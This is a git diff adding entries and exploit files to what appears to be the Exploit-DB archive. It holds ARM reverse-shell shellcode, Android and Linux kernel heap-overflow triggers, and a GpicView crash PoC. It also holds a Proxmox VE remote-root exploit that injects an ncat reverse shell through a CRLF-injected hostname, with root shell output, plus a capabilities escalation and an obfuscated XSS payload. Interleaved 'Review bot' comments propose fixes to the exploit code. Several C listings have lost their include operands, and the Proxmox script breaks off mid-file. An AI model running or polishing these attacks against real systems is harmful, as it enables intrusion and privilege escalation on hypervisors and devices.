diff --git a/files.csv b/files.csv
index 1532ba4bd..9cfafac72 100755
--- a/files.csv
+++ b/files.csv
@@ -35698,6 +35698,7 @@ id,file,description,date,author,platform,type,port
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
+39458,platforms/php/webapps/39458.txt,"OCS Inventory NG <= 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0
 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
 39461,platforms/multiple/dos/39461.txt,"Adobe Flash -TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0
 39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0
@@ -35733,3 +35734,14 @@ id,file,description,date,author,platform,type,port
 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
 39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino <= R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0
+39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to {ip:port} with /bin/sh - 95 bytes",2016-02-26,Xeon,arm,shellcode,0
+39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0
+39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection Vulnerability",2016-02-26,"xevil and Blankon33",php,webapps,80
+39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0
+39500,platforms/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - CSRF Vulnerability",2016-02-26,Sysdream,linux,webapps,443
+39501,platforms/php/webapps/39501.txt,"Centreon <= 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0
+39502,platforms/linux/dos/39502.py,"GpicView 0.2.5 - Crash PoC",2016-02-26,"David Silveiro",linux,dos,0
+39503,platforms/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos,0
+39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0
+39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0
+39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80
diff --git a/platforms/android/dos/39504.c b/platforms/android/dos/39504.c
new file mode 100755
index 000000000..a63beb3b2
--- /dev/null
+++ b/platforms/android/dos/39504.c
@@ -0,0 +1,91 @@
+/*
+Source: https://code.google.com/p/google-security-research/issues/detail?id=734
+
+The Adreno GPU driver for the MSM Linux kernel contains a heap
+overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug
+results from an incorrect conversion to a signed type when calculating
+the minimum count value for the query option. This results in a
+negative integer being used to calculate the size of a buffer, which
+can result in an integer overflow and a small sized allocation on
+32-bit systems:
+
+int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,
+ unsigned int groupid, unsigned int __user *countables,
+ unsigned int count, unsigned int *max_counters)
+{
+...
+ if (countables == NULL || count == 0) {
+ kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
+ return 0;
+ }
+
+ t = min_t(int, group->reg_count, count);
+
+ buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);
+ if (buf == NULL) {
+ kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
+ return -ENOMEM;
+ }
+
+ for (i = 0; i < t; i++)
+ buf[i] = group->regs[i].countable;
+
+Note that the "count" parameter is fully controlled. Setting count =
+0x80000001 will result in min_t returning 0x80000001 for "t", and
+kmalloc allocating a buffer of size 0x4. The loop will then overflow
+"buf" because "t" is unsigned, i.e. a large positive value.
+
+The bug was added in the following commit:
+
+https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c
+
+A proof-of-concept that triggers this issue (adreno_perfcnt_query.c)
+is attached. On Android devices /dev/kgsl-3d0 is typically accessible
+in an untrusted app domain, so if exploited this issue could be used
+for local privilege escalation.
+
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+struct kgsl_perfcounter_query {
+ unsigned int groupid;
+ unsigned int *countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+
+#define KGSL_IOC_TYPE 0x09
+#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
+
+int main(void) {
+ int fd;
+ struct kgsl_perfcounter_query data;
+ unsigned int countables[16];
+
+ fd = open("/dev/kgsl-3d0", O_RDWR);
+
+ if (fd == -1) {
+ perror("open");
+ return -1;
+ }
+
+ memset(&data, 0, sizeof(struct kgsl_perfcounter_query));
+
+ data.groupid = 1;
+ data.countables = (unsigned int *) &countables;
+ data.count = 0x80000001;
+
+ ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);
+
+ close(fd);
+
+ return 0;
+}
diff --git a/platforms/arm/shellcode/39496.c b/platforms/arm/shellcode/39496.c
new file mode 100755
index 000000000..63b92944b
--- /dev/null
+++ b/platforms/arm/shellcode/39496.c
@@ -0,0 +1,37 @@
+/*
+ Title : Linux/ARM - Connect back to {ip:port} with /bin/sh
+ Length : 95 bytes
+ Date : 2014-06-03
+ Author : Xeon
+ Tested : ARM1176 rev6 (v6l)
+*/
+
+#include
+#include
+
+ char *shellcode = "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x92\x1a\x90\x1a\x17\x27\x01\xdf"
+ "\x02\x20\x41\x1e\x82\x1e\x07\x02\xe7\x3f\x01\xdf\x05\x1c\x01\xac"
+ "\x02\x21\x21\x60\x02\x34\x05\x21\x21\x70\x01\x34\x39\x21\x21\x70"
+ "\x0a\x21\x02\x91\x04\x34\x21\x70\x01\xa9\x10\x22\x02\x37\x01\xdf"
+ "\xdc\x3f\x02\x21\x28\x1c\x01\xdf\x01\x39\xfb\xd5\x49\x1a\x92\x1a"
+ "\x0b\x27\x01\xa0\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x73\x68"; /* 10.0.0.10:1337 */
+
+int main()
+{
+__asm__ ( "eor r0, r0\n\t"
+ "sub r0, #1\n\t"
+ "mov r1, r0\n\t"
+ "mov r2, r0\n\t"
+ "mov r3, r0\n\t"
+ "mov r4, r0\n\t"
+ "mov r5, r0\n\t"
+ "mov r6, r0\n\t"
+ "mov r7, r0\n\t");
+
+ printf("Shellcode length: %d\n", strlen(shellcode));
+ printf("Running shellcode...\n");
+ (*(void(*)()) shellcode)();
+ printf("Failed!\n");
+ return 0;
+}
+
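Review bot: The seven `#include` directives at the top of 39504.c carry no header operand in this copy, so the file cannot compile as shown; most likely the angle-bracketed names were dropped when the listing was rendered, and the same loss appears in 39496.c and 39505.c in this commit. The header comment explains the signed `min_t` conversion well, but the trigger line itself is bare; a comment above `data.count = 0x80000001;` such as `/* negative when treated as int, so min_t(int, ...) keeps it and the kmalloc size wraps (see header) */` would tie the PoC to the analysis. The commit does not show the driver patch, so the fix direction (presumably an unsigned comparison bounded by group->reg_count) should only be noted as an assumption to confirm against the referenced tree.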
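Review bot: `printf("Shellcode length: %d\n", strlen(shellcode));` passes a `size_t` to `%d`, which is undefined behaviour in C and at minimum a `-Wformat` warning; the conversion should be `%zu`. The two `#include` directives in 39496.c also lack their header operands in this copy, so the listing does not compile as shown.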
diff --git a/platforms/ashx/webapps/39497.txt b/platforms/ashx/webapps/39497.txt
new file mode 100755
index 000000000..0113f15d4
--- /dev/null
+++ b/platforms/ashx/webapps/39497.txt
@@ -0,0 +1,175 @@ + +Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities + + +Vendor: Infor +Product web page: http://www.infor.com +Affected version: 8.2.0.1136 + + +Summary: Infor® CRM, formerly Saleslogix, is an award-winning +customer relationship management (CRM) solution that provides +a complete view of customer interactions, so your business can +collaborate and respond promptly and knowledgably to customer +inquiries, sales opportunities, and service requests. Infor CRM +includes a robust suite of sales, marketing, and service capabilities, +to offer businesses of all sizes a fast, flexible, and affordable +solution for finding, winning, and growing profitable customer +relationships. + +Desc: Infor CRM suffers from multiple stored cross-site scripting +vulnerabilities. Input passed to several POST/PUT parameters in +JSON format is not properly sanitised before being returned to the +user. This can be exploited to execute arbitrary HTML and script +code in a user's browser session in context of an affected site. 
+ +Tested on: Microsoft-IIS/8.5 + ASP.NET/4.0.30319 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5308 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php + + +21.01.2016 + +--- + + +---------------------------------- +Affected parameter(s): description +---------------------------------- + +PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1 +Host: intranet.zeroscience.mk + + +{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…} +"": "" +$descriptor: "" +$etag: "+CgjMLB+0nA=" +$httpStatus: 200 +$key: "eUSERA0004IX" +$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" +$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" +$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json" +$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json" +$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json" +$updated: "/Date(1456359095000)/" +$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')" +accountId: null +activityId: null +attachDate: "2016-01-25T00:09:39Z" +contactId: null +contractId: null +createDate: "/Date(1456359095000)/" +createUser: "UUSERA0005W0" +dataType: "R" +defectId: null +description: "" +details: {createSource: null} +documentType: null +fileExists: true +fileName: "inforcrm_xss.png" +fileSize: 101722 +historyId: null +leadId: null +modifyDate: "/Date(1456359095000)/" +modifyUser: "UUSERA0005W0" +opportunityId: null +physicalFileName: "!eUSERA0004IXinforcrm_xss.png" +productId: null +remoteStatus: null +returnId: null +salesOrderId: null +ticketId: null +url: null +user: {$key: 
"UUSERA0005W0"} + + + +----------------------------------------------------------- +Affected parameter(s): Description, Location, and LongNotes +----------------------------------------------------------- + +POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1 +Host: intranet.zeroscience.mk + + +{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…} +$descriptor: "" +$httpStatus: 200 +AccountId: null +AccountName: null +ActivityAttendees: {} +ActivityBasedOn: null +Alarm: false +AlarmTime: "2016-01-24T22:45:00Z" +AllowAdd: true +AllowComplete: true +AllowDelete: true +AllowEdit: true +AllowSync: true +AppId: null +Attachment: false +AttachmentCount: null +AttendeeCount: 0 +Category: "Pleasantville" +ContactId: null +ContactName: null +CreateDate: "/Date(-62135596800000)/" +CreateUser: null +Description: "" +Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…} +ChangeKey: null +CreateSource: null +ForeignId1: null +ForeignId2: null +ForeignId3: null +ForeignId4: null +GlobalSyncId: null +ProjectId: null +Tick: null +UserDef1: null +UserDef2: null +UserDef3: null +Duration: "0" +EndDate: "/Date(1456359315286)/" +LeadId: null +LeadName: null +Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"} +$descriptor: "Userovich, User" +$key: "UUSERA0005W0" +Location: "" +LongNotes: "" +ModifyDate: "/Date(-62135596800000)/" +ModifyUser: null +Notes: "Zero Science Lab" +OpportunityId: null +OpportunityName: null +OriginalDate: "/Date(1456358415286)/" +PhoneNumber: null +Priority: "1" +ProcessId: null +ProcessNode: null +RecurIterations: 0 +RecurPeriod: 0 +RecurPeriodSpec: 0 +RecurSkip: null +RecurrenceState: "rsNotRecurring" +Recurring: false +Resources: {} +Rollover: false +StartDate: "2016-01-25T00:00:05Z" +TicketId: null +TicketNumber: null +Timeless: true +Type: "atToDo" +UserActivities: {} +$url: 
"https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
+UserNotifications: {}
+$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
diff --git a/platforms/linux/dos/39502.py b/platforms/linux/dos/39502.py
new file mode 100755
index 000000000..01f7784db
--- /dev/null
+++ b/platforms/linux/dos/39502.py
@@ -0,0 +1,48 @@
+#!/usr/bin/python
+# Exploit Title: GpicView Buffer Overflow DOS
+# Date: 25th February 2016
+# Exploit Author: David Silveiro (Xino.co.uk)
+# Vendor Homepage: lxde.sourceforge.net/gpicview/
+# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
+# Version: 0.2.5
+# Tested on: Ubuntu 14 LTS
+# CVE : 0 day
+
+#Example: python POC.py [image-file]
+
+from sys import argv
+from subprocess import Popen
+from shlex import split
+from time import sleep
+import shutil
+
+def DOS(arg):
+ #"""------------------------------------"""#
+ command = 'gpicview ' + arg[1] #''' Recieve file & construct Popen '''#
+ command_2 = split(command) #"""------------------------------------"""#
+ #"|" "|"#
+ Popen(command_2) #""" Open file with Gpicview """#
+ #"""------------------------------------"""#
+ print("Required: You have 15 seconds")
+ print("to click on preferences, and ")
+ print("check 'Auto Save Images' ")
+
+ sleep(15)
+ #"""------------------------------------"""#
+ buffer = 'A' * 70 + '.png' #"|" Rename image with Buffer "|"#
+ shutil.move(arg[1], buffer) #"""------------------------------------"""#
+
+def main():
+
+ print("Author: David Silveiro ")
+ print("Company: Xino.co.uk ")
+ print(" POC Gpicview DOS ")
+
+ DOS(argv)
+
+ print("File ready for overflow ")
+ print("Now simply rotate the image")
+
+
+if __name__ == "__main__":
+ main()
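Review bot: `DOS()` reads `arg[1]` without checking that an argument was supplied, so running the script without an image path dies with an `IndexError` on `command = 'gpicview ' + arg[1]` instead of the usage shown in the header; a guard at the top of `DOS` such as `if len(arg) < 2: raise SystemExit("usage: python POC.py [image-file]")` fixes it. `shutil.move(arg[1], buffer)` also renames the caller's original image into the current directory, which is needlessly destructive for a PoC; `shutil.copy(arg[1], buffer)` would leave the input intact. The comment `Recieve file` on the `command =` line is a typo for `Receive`.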
diff --git a/platforms/linux/dos/39505.c b/platforms/linux/dos/39505.c
new file mode 100755
index 000000000..c42213520
--- /dev/null
+++ b/platforms/linux/dos/39505.c
@@ -0,0 +1,97 @@
+/*
+Source: https://code.google.com/p/google-security-research/issues/detail?id=735
+
+In certain kernel versions it is possible to use the AIO subsystem (io_submit syscall) to pass size values larger than MAX_RW_COUNT to the networking subsystem's sendmsg implementation. In the L2TP PPP sendmsg implementation, a large size parameter can lead to an integer overflow and kernel heap corruption during socket buffer allocation. This could be exploited to allow local privilege escalation from an unprivileged user account.
+
+This issue affects 64-bit systems running older branches of the Linux kernel, such as version 3.10 and 3.18. More recent major versions aren't affected due to refactoring in the AIO subsystem. The attached proof-of-concept trigger has been tested on a fully updated Ubuntu 14.04 LTS server. This issue is also likely to affect 64-bit Android devices, which typically use branches of 3.10.
+
+The first observation is that an IOCB_CMD_PWRITE of a large length (such as 0xffffffff) will correctly bound the request iocb's ki_nbytes value to MAX_RW_COUNT. However, in the single vector case, if the relevant access_ok check passes in aio_setup_single_vector then the iov length will still be large (0xffffffff). On 64-bit systems it is possible for access_ok(type, user_ptr, 0xffffffff) to succeed.
+
+The second observation is that sock_aio_write does not use the iocb for the sendmsg size calculation, but instead takes the summation of all input iov lengths. Thus calling io_submit with an IOCB_CMD_PWRITE operation on a socket will result in a potentially large value being passed to sendmsg.
+
+The third observation is that AF_PPPOX sockets using the PX_PROTO_OL2TP protocol has a sendmsg implementation that does not bounds check the incoming length parameter (called total_len) before using the value to calculate the length of a socket buffer allocation (using sock_wmalloc).
+
+The fourth observation is that the underlying socket buffer allocation routine __alloc_skb uses an "unsigned int" for it's size parameter rather than a size_t, and that this value can wrap to a small positive value upon alignment calculations and internal space overhead calculations. This results in a small value being passed to kmalloc for the socket buffer data allocation. Then, the size is recalculated using SKB_WITH_OVERHEAD, which effectively re-underflows the size calculation to a small negative value (large unsigned value). The newly created socket buffer has a small backing data buffer and a large size.
+
+The proof-of-concept trigger crashes when writing the skb_shared_info structure into the end of the socket buffer, which is out-of-bounds. Other corruption may also be possible in pppol2tp_sendmsg/l2tp_xmit_skb/ip_output.
+
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ struct sockaddr_pppol2tp sax;
+ struct sockaddr_in addr;
+ int s, sfd, ret;
+ struct iocb *iocbp;
+ struct iocb iocb;
+ aio_context_t ctx_id = 0;
+ void *data;
+
+ s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
+
+ if (s == -1) {
+ perror("socket");
+ return -1;
+ }
+
+ memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));
+
+ sax.sa_family = AF_PPPOX;
+ sax.sa_protocol = PX_PROTO_OL2TP;
+
+ sax.pppol2tp.fd = -1;
+ sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
+ sax.pppol2tp.addr.sin_port = addr.sin_port;
+ sax.pppol2tp.addr.sin_family = AF_INET;
+ sax.pppol2tp.s_tunnel = -1;
+ sax.pppol2tp.s_session = 0;
+ sax.pppol2tp.d_tunnel = -1;
+ sax.pppol2tp.d_session = 0;
+
+ sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));
+
+ if (sfd == -1) {
+ perror("connect");
+ return -1;
+ }
+
+ data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+ if (data == MAP_FAILED) {
+ perror("mmap");
+ return -1;
+ }
+
+ memset(data, 0x41, 0x100001000);
+
+ ret = syscall(__NR_io_setup, 2, &ctx_id);
+
+ if (ret == -1) {
+ perror("io_setup");
+ return -1;
+ }
+
+ memset(&iocb, 0, sizeof(struct iocb));
+
+ iocb.aio_fildes = s;
+ iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
+ iocb.aio_nbytes = 0xfffffe60;
+ iocb.aio_buf = (unsigned long) &data;
+
+ iocbp = &iocb;
+
+ syscall(__NR_io_submit, ctx_id, 1, &iocbp);
+
+ return 0;
+}
diff --git a/platforms/linux/remote/39499.txt b/platforms/linux/remote/39499.txt
new file mode 100755
index 000000000..fb8e73cc3
--- /dev/null
+++ b/platforms/linux/remote/39499.txt
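Review bot: `struct sockaddr_in addr;` is declared but never initialised, yet `addr.sin_addr.s_addr` and `addr.sin_port` are copied into `sax.pppol2tp.addr` before `connect()`, so the peer address is built from indeterminate stack bytes (undefined behaviour; `-Wuninitialized` flags it). Zero it next to `sax`: `memset(&addr, 0, sizeof addr);`. `sfd` holds the `connect()` status rather than a descriptor, so reusing `ret` (already used for `io_setup`) would read more honestly. The eleven `#include` directives at the top of 39505.c have no header operands in this copy, so the listing cannot compile as shown.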
@@ -0,0 +1,465 @@ +===================================================================== +Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS, +Privileges escalation) +===================================================================== + +Description +=========== + +Proxmox is a popular virtualization solution based on KVM and Linux +containers. + +A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and +Proxmox VE 4 beta 1 (LXC) in the +virtual machine creating form allowing authenticated remote users to +overwrite configuration files settings. + + +Configuration file overwriting +============================== + +Because the Proxmox VE application doesn't check the +user-provided "hostname" POST parameter, it's +possible to overwrite configuration files using a CRLF injection. +In Proxmox VE 3, we successfully gained access to the host filesystem +from a container and elevated our container capabilities, allowing us to +obtain user credentials and sniff the network. +In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we +successfully gained root privileges on the host. +It's also possible to exploit Proxmox clusters. + +**Access Vector**: remote + +**Security Risk**: high + +**Vulnerability**: CWE-915 + +Proof of Concept +---------------- + +The following exploit works for Proxmox VE 4 beta 1. The +lxc.hook.pre-start configuration variable is used to trigger the ncat +reverse-shell payload when the container is started. + + #!/usr/bin/env python + + import requests + import socket + import telnetlib + from threading import Thread + import argparse + from time import sleep + + def exploit(target, username, password, vmid, template, realm, +reverse, hostname): + payload = "ncat %s %s -e /bin/sh" % reverse + + print "[~] Obtaining authorization key..." 
+ apireq = requests.post("https://%s/api2/extjs/access/ticket" % +target, + verify=False, + data={"username": username, + "password": password, + "realm": realm}) + response = apireq.json() + if "success" in response and response["success"]: + print "[+] Authentication success." + ticket = response["data"]["ticket"] + csrfticket = response["data"]["CSRFPreventionToken"] + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname), + verify=False, + headers={"CSRFPreventionToken": +csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + +"hostname":"sysdream\nlxc.hook.pre-start=%s &&" % payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + "cpulimit": 1, + "cpuunits": 1024, + "net0":"name=eth0"}) + if createvm.status_code == 200: + response = createvm.json() + if "success" in response and response["success"]: + print "[+] Container Created... (Sleeping 20 seconds)" + sleep(20) + print "[+] Starting container..." + startcontainer = +requests.post("https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" % +(target, hostname, vmid), verify=False, headers={"CSRFPreventionToken": +csrfticket}, cookies={"PVEAuthCookie": ticket}) + if startcontainer.status_code == 200: + response = startcontainer.json() + if "success" in response and response["success"]: + print "[+] Exploit should be working..." + else: + print "[!] Can't start container ! Try to +start it manually." + else: + print "[!] Error creating container..." + print response + else: + print "[!] Error creating Container. Bad HTTP Status +code : %d" % createvm.status_code + else: + print "[!] Authentication failed - Check the credentials..." 
+ + def handler(lport): + print "[~] Starting handler on port %d" % lport + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lport)) + s.listen(1) + conn, addr = s.accept() + + print "[+] Connection from %s" % addr[0] + + t.sock = conn + + print "[+] Pop the shell ! :)" + + t.interact() + + if __name__ == "__main__": + print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas +Chatelain \n" + + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True, help="The target +host (eg : 10.0.0.1:8006)") + + parser.add_argument("--username", required=True) + parser.add_argument("--password", required=True) + + parser.add_argument("--localhost", required=True, help="Local +host IP for the connect-back shell.") + parser.add_argument("--localport", required=True, type=int, +help="Local port for local bind handler") + + parser.add_argument("--vmid", required=False, default="999", +type=int, help="A unique ID for the container, exploit will fail if the +ID already exists.") + + parser.add_argument("--template", required=False, +default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", + help="An existing template in the hypervisor " + "(default : +local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") + + parser.add_argument("--realm", required=False, default="pam", +choices=["pve", "pam"]) + + parser.add_argument("--hostname", required=True, help="The +target hostname") + + args = parser.parse_args() + + handlerthr = Thread(target=handler, args=(args.localport,)) + handlerthr.start() + + exploitthr = Thread(target=exploit, args=(args.target, +args.username, args.password, args.vmid, args.template, args.realm, +(args.localhost, args.localport), args.hostname)) + exploitthr.start() + + handlerthr.join() + +Shell output : + + nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python +remoteroot.py --target 10.25.0.101:8006 --username nicolas --password +pveuser --localhost 10.25.0.10 --localport 
9999 --vmid 456 --realm pve +--hostname pve4 + [~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain + + [~] Starting handler on port 9999 + [~] Obtaining authorization key... + [+] Authentication success. + [+] Container Created... (Sleeping 20 seconds) + [+] Exploit should be working... + [+] Connection from 10.25.0.101 + [+] Pop the shell ! + whoami + root + id + uid=0(root) gid=0(root) groups=0(root) + +The following exploit works for Proxmox VE 3. This proof of concept +mount the host /dev/dm-0 on the container and add multiples capabilities +on the container. + + + #!/usr/bin/env python + + import requests + import socket + import telnetlib + from threading import Thread + import argparse + + def exploit(target, username, password, vmid, template, realm, +hostname): + payload = "sysdream\"\nDEVNODES=\"dm-0:r +\"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on, +dac_override:on\"\n#" + print "[~] Obtaining authorization key..." + apireq = requests.post("https://%s/api2/extjs/access/ticket" % +target, + verify=False, + data={"username": username, + "password": password, + "realm": realm}) + response = apireq.json() + if "success" in response and response["success"]: + print "[+] Authentication success." + ticket = response["data"]["ticket"] + csrfticket = response["data"]["CSRFPreventionToken"] + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname), + verify=False, + headers={"CSRFPreventionToken": +csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + "hostname": payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + "cpus": 1, + +"netif":"ifname=eth0,bridge=vmbr0"}) + if createvm.status_code == 200: + response = createvm.json() + if "success" in response and response["success"]: + print "[+] Countainer (Capabilities + DM-0 Mount) +Created." + else: + print "[!] Error creating container..." 
+ print response + else: + print "[!] Error creating Container. Bad HTTP Status +code : %d" % createvm.status_code + else: + print "[!] Authentication failed - Check the credentials..." + + if __name__ == "__main__": + print "[~] Proxmox VE 3 Authenticated Privileges Escalation +Exploit - Nicolas Chatelain \n" + + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True, help="The target +host (eg : 10.0.0.1:8006)") + + parser.add_argument("--username", required=True) + parser.add_argument("--password", required=True) + + parser.add_argument("--vmid", required=False, default="999", +type=int, help="A unique ID for the container, exploit will fail if the +ID already exists.") + + parser.add_argument("--template", required=False, +default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", + help="An existing template in the hypervisor +(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") + + parser.add_argument("--hostname", required=True, help="The +target hostname") + + parser.add_argument("--realm", required=False, default="pam", +choices=["pve", "pam"]) + + args = parser.parse_args() + + exploit(args.target, args.username, args.password, args.vmid, +args.template, args.realm, args.hostname) + +Shell output : + + nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python +privescalation.py --username root --password sysofdream --vmid 123 +--realm pam --target 10.25.0.110:8006 --hostname pve3 + [~] Proxmox VE 3 Authenticated Privileges Escalation Exploit - +Nicolas Chatelain + + [~] Obtaining authorization key... + [+] Authentication success. + [+] Countainer (Capabilities + DM-0 Mount) Created. + +-- On container : + + root@sysdream:/# ls -lah /dev/dm-0 + brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0 + +--- +Stored Cross-Site Scripting +=========================== + +Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1. 
+ +**Access Vector**: remote + +**Security Risk**: high + + +Proof of Concept +---------------- + +The following exploit will create a stored XSS displaying the user +cookies and the PVE CSRFPreventionToken. + + + #!/usr/bin/env python + + import requests + import socket + import telnetlib + from threading import Thread + import argparse + + def exploit(target, username, password, vmid, template, realm, +version, hostname): + payload = +"eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))" + print "[~] Obtaining authorization key..." + apireq = requests.post("https://%s/api2/extjs/access/ticket" % +target, + verify=False, + data={"username": username, + "password": password, + "realm": realm}) + response = apireq.json() + if "success" in response and response["success"]: + print "[+] Authentication success." + ticket = response["data"]["ticket"] + csrfticket = response["data"]["CSRFPreventionToken"] + if version == "4": + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname), + verify=False, + headers={"CSRFPreventionToken": +csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + +"hostname":"" % payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + "cpulimit": 1, + "cpuunits": 1024, + "net0":"name=eth0"}) + elif version == "3": + createvm = +requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname), + verify=False, +headers={"CSRFPreventionToken": csrfticket}, + cookies={"PVEAuthCookie": ticket}, + data={"vmid": vmid, + +"hostname":"" % payload, + "storage": "local", + "password": "sysdream", + "ostemplate": template, + "memory": 512, + "swap": 512, + "disk": 2, + 